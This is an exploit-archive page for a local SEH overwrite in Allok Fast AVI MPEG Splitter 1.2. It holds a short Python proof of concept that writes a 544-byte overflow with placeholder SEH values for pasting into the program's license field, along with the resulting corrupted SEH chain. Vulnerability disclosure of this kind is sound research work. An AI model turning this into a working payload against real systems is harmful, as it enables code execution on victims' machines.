Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite

2018.08.02

Credit: Shubham Singh

Risk: High

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

#!/usr/bin/env python
# Exploit Title : Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC
# Vulnerability Type: SEH Overwrite POC
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovey Date : 01/08/2018
# Software Link : http://www.alloksoft.com/fast_splitter.htm
# Tested Version : 1.2
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce:
# Run the python exploit.py , Open "exploit.txt" and copy content.
# Open Fast AVI MPEG Splitter , A registration prompt will appear.
# In the License field paste the content of "exploit.txt".
# Press "OK" and B00m Crashed.
#SEH chain of main thread, item 0
# Address=00129B78
# SE handler=43434343
#SEH chain of main thread, item 1
# Address=42424242
# SE handler=*** CORRUPT ENTRY ***
buffer = "\x41" * 544
nseh = "\x42\x42\x42\x42"
seh= "\x43\x43\x43\x43"
exploit = buffer + nseh + seh
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.